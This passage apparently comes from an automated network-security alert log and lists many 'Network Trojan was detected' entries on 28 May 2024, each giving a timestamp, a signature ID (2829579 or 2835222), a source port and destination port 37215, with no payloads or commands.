                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312665
                  SID:2829579
                  Source Port:44436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604443
                  SID:2835222
                  Source Port:56922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649850
                  SID:2829579
                  Source Port:59672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585350
                  SID:2829579
                  Source Port:38822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563574
                  SID:2829579
                  Source Port:45804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793554
                  SID:2829579
                  Source Port:37218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555127
                  SID:2829579
                  Source Port:40966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555368
                  SID:2835222
                  Source Port:34902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651740
                  SID:2829579
                  Source Port:57448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810485
                  SID:2829579
                  Source Port:50206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920041
                  SID:2829579
                  Source Port:45004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912178
                  SID:2835222
                  Source Port:59352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923134
                  SID:2829579
                  Source Port:52342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.578711
                  SID:2835222
                  Source Port:50184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795262
                  SID:2829579
                  Source Port:52014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.928256
                  SID:2835222
                  Source Port:39898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664862
                  SID:2835222
                  Source Port:36220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888303
                  SID:2829579
                  Source Port:41242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660017
                  SID:2835222
                  Source Port:53394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745949
                  SID:2835222
                  Source Port:34154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720226
                  SID:2835222
                  Source Port:41884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930394
                  SID:2829579
                  Source Port:56362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750070
                  SID:2829579
                  Source Port:49514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.683195
                  SID:2835222
                  Source Port:46912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583390
                  SID:2829579
                  Source Port:57548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277846
                  SID:2829579
                  Source Port:58358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278724
                  SID:2835222
                  Source Port:54368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738141
                  SID:2835222
                  Source Port:51848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577751
                  SID:2835222
                  Source Port:60628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546553
                  SID:2829579
                  Source Port:52658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578445
                  SID:2829579
                  Source Port:38760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537215
                  SID:2835222
                  Source Port:53652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846745
                  SID:2829579
                  Source Port:53334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316588
                  SID:2829579
                  Source Port:34052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900444
                  SID:2829579
                  Source Port:48472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488826
                  SID:2835222
                  Source Port:38398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.916182
                  SID:2835222
                  Source Port:45128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695722
                  SID:2829579
                  Source Port:55564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493595
                  SID:2835222
                  Source Port:43948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793542
                  SID:2829579
                  Source Port:44392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874574
                  SID:2835222
                  Source Port:34624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845200
                  SID:2829579
                  Source Port:36408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601601
                  SID:2835222
                  Source Port:55498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.880044
                  SID:2835222
                  Source Port:44654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.800768
                  SID:2835222
                  Source Port:51022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:23.802004
                  SID:2829579
                  Source Port:53748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.595302
                  SID:2829579
                  Source Port:57194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766486
                  SID:2835222
                  Source Port:56084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650996
                  SID:2835222
                  Source Port:33406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627827
                  SID:2835222
                  Source Port:45390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586337
                  SID:2835222
                  Source Port:39532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659554
                  SID:2829579
                  Source Port:47306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546744
                  SID:2835222
                  Source Port:50618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.788983
                  SID:2829579
                  Source Port:51996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745949
                  SID:2835222
                  Source Port:51154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547492
                  SID:2829579
                  Source Port:51722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489941
                  SID:2829579
                  Source Port:35704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798086
                  SID:2835222
                  Source Port:58332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491189
                  SID:2835222
                  Source Port:36682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719526
                  SID:2829579
                  Source Port:51968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528193
                  SID:2829579
                  Source Port:54072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.805234
                  SID:2829579
                  Source Port:51696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592903
                  SID:2835222
                  Source Port:60626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.801101
                  SID:2829579
                  Source Port:33932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529246
                  SID:2835222
                  Source Port:55182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.605947
                  SID:2835222
                  Source Port:39914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627725
                  SID:2829579
                  Source Port:45754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910511
                  SID:2829579
                  Source Port:50724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651729
                  SID:2829579
                  Source Port:51962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809977
                  SID:2835222
                  Source Port:46780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537272
                  SID:2829579
                  Source Port:37686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489438
                  SID:2835222
                  Source Port:43030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527974
                  SID:2829579
                  Source Port:53668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628950
                  SID:2829579
                  Source Port:58038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586888
                  SID:2829579
                  Source Port:57126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796821
                  SID:2829579
                  Source Port:57662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695302
                  SID:2835222
                  Source Port:39684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906500
                  SID:2835222
                  Source Port:51072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547628
                  SID:2835222
                  Source Port:44638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.682922
                  SID:2835222
                  Source Port:39146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695103
                  SID:2829579
                  Source Port:36494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651454
                  SID:2829579
                  Source Port:54402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629666
                  SID:2835222
                  Source Port:60090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766061
                  SID:2835222
                  Source Port:51022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738112
                  SID:2829579
                  Source Port:52960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927229
                  SID:2835222
                  Source Port:35670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591848
                  SID:2835222
                  Source Port:39458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489468
                  SID:2835222
                  Source Port:54884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494891
                  SID:2835222
                  Source Port:50768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789809
                  SID:2829579
                  Source Port:55374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.888370
                  SID:2829579
                  Source Port:55618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.811627
                  SID:2829579
                  Source Port:59212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719478
                  SID:2835222
                  Source Port:54182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788333
                  SID:2829579
                  Source Port:41066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742645
                  SID:2829579
                  Source Port:47524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908571
                  SID:2835222
                  Source Port:41300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.659394
                  SID:2835222
                  Source Port:55342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491154
                  SID:2829579
                  Source Port:55734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720250
                  SID:2829579
                  Source Port:59812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793322
                  SID:2829579
                  Source Port:42426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789510
                  SID:2835222
                  Source Port:57416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529648
                  SID:2835222
                  Source Port:58340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678738
                  SID:2835222
                  Source Port:51260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795404
                  SID:2829579
                  Source Port:59706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768412
                  SID:2829579
                  Source Port:39858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576100
                  SID:2829579
                  Source Port:36958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767633
                  SID:2835222
                  Source Port:58550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.927243
                  SID:2829579
                  Source Port:43640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661565
                  SID:2829579
                  Source Port:38576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.801597
                  SID:2829579
                  Source Port:49340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766095
                  SID:2829579
                  Source Port:51228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.323440
                  SID:2835222
                  Source Port:57628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.792552
                  SID:2829579
                  Source Port:46842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529980
                  SID:2829579
                  Source Port:41522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649342
                  SID:2829579
                  Source Port:53290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:09.531253
                  SID:2829579
                  Source Port:34584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695156
                  SID:2829579
                  Source Port:59990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279400
                  SID:2829579
                  Source Port:40466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536590
                  SID:2835222
                  Source Port:45126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651203
                  SID:2835222
                  Source Port:52562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496383
                  SID:2835222
                  Source Port:42992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942676
                  SID:2829579
                  Source Port:52036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870627
                  SID:2835222
                  Source Port:39312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550567
                  SID:2829579
                  Source Port:55290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495844
                  SID:2835222
                  Source Port:48978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.587968
                  SID:2835222
                  Source Port:54712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660613
                  SID:2829579
                  Source Port:32820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912547
                  SID:2829579
                  Source Port:52400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908590
                  SID:2835222
                  Source Port:38950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742635
                  SID:2829579
                  Source Port:55690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576155
                  SID:2829579
                  Source Port:36612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591348
                  SID:2835222
                  Source Port:58986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720024
                  SID:2835222
                  Source Port:53140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650850
                  SID:2835222
                  Source Port:40068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627924
                  SID:2829579
                  Source Port:56056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696079
                  SID:2829579
                  Source Port:56766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536104
                  SID:2829579
                  Source Port:55746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.888381
                  SID:2835222
                  Source Port:39136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742608
                  SID:2829579
                  Source Port:59368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664842
                  SID:2835222
                  Source Port:47248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543229
                  SID:2829579
                  Source Port:51468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920021
                  SID:2829579
                  Source Port:42742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278039
                  SID:2835222
                  Source Port:34926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.925761
                  SID:2829579
                  Source Port:55952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.684159
                  SID:2835222
                  Source Port:34882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536077
                  SID:2829579
                  Source Port:55338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809990
                  SID:2835222
                  Source Port:52402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911525
                  SID:2829579
                  Source Port:46204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.888752
                  SID:2835222
                  Source Port:50774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592944
                  SID:2829579
                  Source Port:38478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910519
                  SID:2835222
                  Source Port:48826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536615
                  SID:2835222
                  Source Port:41460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548247
                  SID:2829579
                  Source Port:55058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720693
                  SID:2829579
                  Source Port:35058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651778
                  SID:2829579
                  Source Port:45854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.916681
                  SID:2829579
                  Source Port:49020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550699
                  SID:2835222
                  Source Port:60122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.290845
                  SID:2835222
                  Source Port:50628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577138
                  SID:2835222
                  Source Port:41686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492444
                  SID:2835222
                  Source Port:55368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695733
                  SID:2835222
                  Source Port:35434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.799422
                  SID:2829579
                  Source Port:53578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492009
                  SID:2829579
                  Source Port:43944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661550
                  SID:2835222
                  Source Port:43158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729727
                  SID:2829579
                  Source Port:49118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.797047
                  SID:2829579
                  Source Port:57578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315646
                  SID:2829579
                  Source Port:41584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657946
                  SID:2829579
                  Source Port:41292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769355
                  SID:2829579
                  Source Port:50246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.295832
                  SID:2835222
                  Source Port:57342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316046
                  SID:2835222
                  Source Port:32918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529062
                  SID:2829579
                  Source Port:34406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887996
                  SID:2835222
                  Source Port:42544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543128
                  SID:2829579
                  Source Port:38602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.913954
                  SID:2829579
                  Source Port:55602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942539
                  SID:2829579
                  Source Port:33136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.771543
                  SID:2829579
                  Source Port:52956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279446
                  SID:2829579
                  Source Port:58066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543179
                  SID:2835222
                  Source Port:50030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794610
                  SID:2835222
                  Source Port:58782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887968
                  SID:2835222
                  Source Port:54094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786406
                  SID:2835222
                  Source Port:53130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276560
                  SID:2835222
                  Source Port:56734
